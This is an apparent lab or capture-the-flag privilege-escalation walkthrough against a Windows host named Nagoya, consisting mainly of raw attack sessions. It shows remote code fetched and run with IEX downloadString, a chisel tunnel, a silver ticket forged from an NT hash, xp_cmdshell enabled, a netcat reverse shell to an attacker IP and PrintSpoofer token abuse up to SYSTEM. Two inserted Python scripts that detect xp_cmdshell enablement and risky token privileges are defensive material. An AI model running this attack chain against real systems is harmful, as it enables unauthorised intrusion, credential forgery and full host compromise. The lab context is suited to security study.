Priv Esc
Last updated
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> IEX(New-Object Net.WebClient).downloadString('http://192.168.45.239/PrivescCheck.ps1');Invoke-PrivescCheck
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> netstat -ano | findstr /I 1433
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 2184
TCP [::]:1433 [::]:0 LISTENING 2184
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> iwr 192.168.45.239/chisel.exe -o chisel.exe
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> .\chisel.exe client 192.168.45.239:1335 R:1433:127.0.0.1:1433
chisel.exe : 2024/10/15 19:14:26 client: Connecting to ws://192.168.45.239:1335
+ CategoryInfo : NotSpecified: (2024/10/15 19:1...168.45.239:1335:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2024/10/15 19:14:27 client: Connected (Latency 39.4055ms)
❯ netexec mssql 127.0.0.1 -u svc_mssql -p Service1 --port 1433
MSSQL 127.0.0.1 1433 NAGOYA [*] Windows 10 / Server 2019 Build 17763 (name:NAGOYA) (domain:nagoya-industries.com)
MSSQL 127.0.0.1 1433 NAGOYA [+] nagoya-industries.com\svc_mssql:Service1
Grant a Silver Ticket using MSSQL
❯ impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com Administratorii
❯ export KRB5CCNAME=$PWD/Administrator.ccache
SQL (NAGOYA-IND\Administrator dbo@master)> sp_configure 'show advanced options', '1';
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator dbo@master)> RECONFIGURE;
SQL (NAGOYA-IND\Administrator dbo@master)> sp_configure 'xp_cmdshell', '1';
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator dbo@master)> RECONFIGURE;
SQL (NAGOYA-IND\Administrator dbo@master)> xp_cmdshell whoami
output
--------------------
nagoya-ind\svc_mssql
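The `INFO(...)` lines above are SQL Server's own configuration-change messages; the same text is written to the SQL Server error log, so the enabling of `xp_cmdshell` leaves a record on the host. The following Python is an added example, not part of this write-up, that scans error-log lines in that format and reports every change that switches a watched option on. The log lines are constructed to mirror the messages shown above; the option names are real `sp_configure` options.

```python
import re
from dataclasses import dataclass

# SQL Server's configuration-change message, as seen in the session above:
#   Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
CONFIG_CHANGE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose enablement lets a SQL login run OS commands or script objects.
# 'show advanced options' is included because it is the prerequisite step seen above.
WATCHED = {"xp_cmdshell", "Ole Automation Procedures", "show advanced options"}


@dataclass
class ConfigChange:
    option: str
    old: int
    new: int
    line: str


def parse_line(line):
    """Return a ConfigChange for a configuration-change message, else None."""
    m = CONFIG_CHANGE.search(line)
    if not m:
        return None
    return ConfigChange(m["option"], int(m["old"]), int(m["new"]), line.rstrip())


def find_enablements(lines):
    """Return the changes that leave a watched option turned on (new value 1).

    'changed from 1 to 1' is reported too: it means someone ran sp_configure
    on an option that was already on, which is still worth a look.
    """
    hits = []
    for line in lines:
        change = parse_line(line)
        if change and change.option in WATCHED and change.new == 1:
            hits.append(change)
    return hits


# Constructed sample error-log excerpt: one unrelated entry, the two changes
# made in the session above, and a later change that turns xp_cmdshell off.
SAMPLE_LOG = """\
2024-10-15 19:20:01.12 spid51 Starting up database 'tempdb'.
2024-10-15 19:21:03.44 spid58 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-10-15 19:21:05.10 spid58 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-10-15 19:25:00.00 spid58 Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
""".splitlines()


if __name__ == "__main__":
    for hit in find_enablements(SAMPLE_LOG):
        print(f"ALERT: '{hit.option}' set to {hit.new} (was {hit.old}): {hit.line}")
```

Run on the sample, the script raises two alerts (`show advanced options` and `xp_cmdshell` going to 1) and stays quiet on the later change back to 0; pointing it at a real error log only requires reading the file into `find_enablements`.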
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> iwr 192.168.45.239/nc.exe -o nc.exe
SQL (NAGOYA-IND\Administrator dbo@master)> xp_cmdshell "C:\\programdata\\nc.exe 192.168.45.239 1337 -e powershell.exe"
PS C:\Windows\system32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
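The privilege table above is what decides the next step: `SeImpersonatePrivilege` is enabled in the `svc_mssql` shell, which is exactly the condition PrintSpoofer reports finding further down. The Python below is an added example, not part of the original write-up, that parses `whoami /priv` output and lists the held privileges that allow a process to obtain or act under another account's token; it is the check to run when reviewing what a service account has been granted. The input is a constructed copy of the table shown above, and `TOKEN_PRIVILEGES` is my own triage list, not something the page defines.

```python
import re

# Privileges that let a process obtain, or act under, another account's token,
# or bypass object ACLs outright. This is a triage list, not an exhaustive one.
TOKEN_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "replace a process level token",
    "SeDebugPrivilege": "open and read/write any process",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTakeOwnershipPrivilege": "take ownership of securable objects",
}

# One data row of `whoami /priv`: name, free-text description, state.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Map privilege name -> (description, is_enabled) from `whoami /priv` output.

    Header, separator and blank lines do not match ROW and are skipped.
    """
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = (m.group(2), m.group(3) == "Enabled")
    return privs


def flag_token_privileges(privs):
    """Return sorted [(name, is_enabled)] for every held privilege in TOKEN_PRIVILEGES.

    A 'Disabled' entry is still reported: the privilege is present in the token
    and the process can enable it itself with AdjustTokenPrivileges, so the State
    column describes the current moment, not a mitigation.
    """
    return sorted((name, enabled) for name, (_, enabled) in privs.items()
                  if name in TOKEN_PRIVILEGES)


# Constructed sample: a copy of the table obtained in the svc_mssql shell above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


if __name__ == "__main__":
    held = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for name, enabled in flag_token_privileges(held):
        state = "ENABLED" if enabled else "held but disabled"
        print(f"{name:32s} {state:18s} {TOKEN_PRIVILEGES[name]}")
```

On the sample this reports `SeAssignPrimaryTokenPrivilege` (held, disabled) and `SeImpersonatePrivilege` (enabled); the remaining six rows are ordinary user privileges and are not listed. The same parser works on output captured from any account, which makes it a quick way to compare what a service account actually holds against what the service needs.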
PS C:\programdata> iwr 192.168.45.239/PrintSpoofer64.exe -o printspoofer.exe
PS C:\programdata> .\printspoofer.exe -i -c powershell.exe
.\printspoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
whoami ; type C:\Users\Administrator\Desktop\proof.txt ; ipconfig
nagoya-ind\nagoya$
707ad72dba55f91d0bba2cf131119dd7
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.246.21
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.246.254
PS C:\Windows\system32>